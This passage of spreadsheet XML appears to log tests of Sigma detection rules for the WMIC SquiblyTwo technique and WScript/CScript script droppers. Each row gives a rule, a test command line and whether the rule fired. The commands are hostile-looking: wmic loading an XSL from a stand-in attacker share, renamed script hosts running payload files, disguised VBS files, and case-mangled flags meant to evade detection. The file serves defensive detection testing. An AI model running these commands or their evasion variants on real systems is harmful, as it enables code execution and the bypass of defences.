      </c>
      <c r="I2539" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2539" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2539" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2540" ht="15.75" customHeight="1" s="42">
      <c r="A2540" s="43" t="n"/>
      <c r="B2540" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2540" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2540" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2540" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F2540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2540" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2540" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2540" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2540" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2540" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2541" ht="15.75" customHeight="1" s="42">
      <c r="A2541" s="43" t="n"/>
      <c r="B2541" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2541" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2541" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2541" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F2541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2541" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2541" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2541" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2541" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2541" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2542" ht="15.75" customHeight="1" s="42">
      <c r="A2542" s="43" t="n"/>
      <c r="B2542" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2542" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2542" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2542" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F2542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2542" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2542" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2542" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2542" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2542" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2543" ht="15.75" customHeight="1" s="42">
      <c r="A2543" s="43" t="n"/>
      <c r="B2543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2543" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2543" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2543" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F2543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2543" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2543" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2543" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2544" ht="15.75" customHeight="1" s="42">
      <c r="A2544" s="44" t="n"/>
      <c r="B2544" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2544" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2544" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2544" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2544" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2544" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2544" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2544" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2544" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2545" ht="15.75" customHeight="1" s="42">
      <c r="A2545" s="44" t="n"/>
      <c r="B2545" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2545" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2545" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2545" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2545" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2545" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2545" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2545" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2545" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2546" ht="15.75" customHeight="1" s="42">
      <c r="A2546" s="44" t="n"/>
      <c r="B2546" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2546" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2546" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2546" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2546" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2546" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2546" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2546" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2546" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2547" ht="15.75" customHeight="1" s="42">
      <c r="A2547" s="44" t="n"/>
      <c r="B2547" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2547" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2547" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2547" s="44" t="inlineStr">
        <is>
          <t>cscript.exe C:\ProgramData\payload.js</t>
        </is>
      </c>
      <c r="F2547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2547" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2547" s="43" t="n"/>
      <c r="J2547" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2547" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2548" ht="15.75" customHeight="1" s="42">
      <c r="A2548" s="44" t="n"/>
      <c r="B2548" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2548" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2548" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2548" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wscript.exe C:\Windows\Temp\updater.exe &amp;&amp; C:\Windows\Temp\updater.exe C:\Windows\Temp\payload.vbs</t>
        </is>
      </c>
      <c r="F2548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2548" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2548" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2548" s="44" t="inlineStr">
        <is>
          <t>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2548" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2548" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2549" ht="15.75" customHeight="1" s="42">
      <c r="A2549" s="44" t="n"/>
      <c r="B2549" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2549" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2549" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2549" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vbs C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2549" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2549" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2549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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2549" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2550" ht="15.75" customHeight="1" s="42">
      <c r="A2550" s="44" t="n"/>
      <c r="B2550" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2550" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2550" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2550" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vBs C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2550" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2550" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2550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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2550" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2551" ht="15.75" customHeight="1" s="42">
      <c r="A2551" s="44" t="n"/>
      <c r="B2551" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2551" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2551" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2551" s="44" t="inlineStr">
        <is>
          <t>wscript.exe -"/E:vbs" C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2551" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2551" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2551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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2551" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2552" ht="15.75" customHeight="1" s="42">
      <c r="A2552" s="44" t="n"/>
      <c r="B2552" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2552" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2552" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2552" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:VBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2552" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2552" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2552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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2552" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2553" ht="15.75" customHeight="1" s="42">
      <c r="A2553" s="44" t="n"/>
      <c r="B2553" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2553" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2553" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2553" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:vBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2553" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2553" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2553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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2553" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2554" ht="15.75" customHeight="1" s="42">
      <c r="A2554" s="44" t="n"/>
      <c r="B2554" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2554" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2554" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2554" s="44" t="inlineStr">
        <is>
          <t>wscript.exe /"/E:vbs" C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2554" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2554" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2554" s="4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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2554" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2555" ht="15.75" customHeight="1" s="42">
      <c r="A2555" s="44" t="n"/>
      <c r="B2555" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2555" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2555" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2555" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //e:VBS C:\Windows\Temp\payload.txt</t>
        </is>
      </c>
      <c r="F2555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2555" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2555" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2555" s="4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555" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2555" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2556" ht="15.75" customHeight="1" s="42">
      <c r="A2556" s="44" t="n"/>
      <c r="B2556" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2556" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2556" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2556" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:VBScript C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2556" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2556" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2556" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2556" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2556" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2557" ht="15.75" customHeight="1" s="42">
      <c r="A2557" s="44" t="n"/>
      <c r="B2557" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2557" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2557" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2557" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:vBSCRiPt C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2557" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2557" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2557" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2557" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2557" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2558" ht="15.75" customHeight="1" s="42">
      <c r="A2558" s="44" t="n"/>
      <c r="B2558" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2558" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2558" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2558" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript //e:vBsCRIpt C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2558" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2558" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2558" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2558" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2558" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2559" ht="15.75" customHeight="1" s="42">
      <c r="A2559" s="44" t="n"/>
      <c r="B2559" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2559" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2559" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2559" s="44" t="inlineStr">
        <is>
          <t>copy C:\Users\Public\malicious.vbs C:\Windows\System32\drivers\etc\legit.txt &amp;&amp; cscript -"/e:VBScript" C:\Windows\System32\drivers\etc\legit.txt</t>
        </is>
      </c>
      <c r="F2559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2559" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2559" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2559" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2559" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2559" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2560" ht="15.75" customHeight="1" s="42">
      <c r="A2560" s="43" t="n"/>
      <c r="B2560" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C2560" s="44" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D2560" s="44" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E2560" s="44" t="inlineStr">
        <is>
          <t>mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc.exe""):window.close")</t>
        </is>
      </c>
      <c r="F2560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2560" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2560" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2560" s="4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2560" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2560" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2561" ht="15.75" customHeight="1" s="42">
      <c r="A2561" s="43" t="n"/>
      <c r="B2561" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2561" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2561" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2561" s="44" t="inlineStr">
        <is>
          <t>copy script.vbs script.vbs.txt &amp;&amp; cscript //e:vbs script.vbs.txt</t>
        </is>
      </c>
      <c r="F2561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2561" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2561" s="43" t="n"/>
      <c r="J2561" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2561" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2562" ht="15.75" customHeight="1" s="42">
      <c r="A2562" s="43" t="n"/>
      <c r="B2562" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2562" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2562" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2562" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //E:vbs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2562" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2562" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2562" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2562" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2562" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2563" ht="15.75" customHeight="1" s="42">
      <c r="A2563" s="43" t="n"/>
      <c r="B2563" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2563" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2563" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2563" s="44" t="inlineStr">
        <is>
          <t>cscript.exe /"/E:vbs" C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2563" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2563" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2563" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2563" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2563" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2564" ht="15.75" customHeight="1" s="42">
      <c r="A2564" s="43" t="n"/>
      <c r="B2564" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2564" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2564" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2564" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //e:vBS C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2564" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2564" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2564" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2564" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2564" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2565" ht="15.75" customHeight="1" s="42">
      <c r="A2565" s="43" t="n"/>
      <c r="B2565" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2565" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2565" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2565" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //E:vBs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2565" s="44" t="b">
        <v>1</v>
      </c>
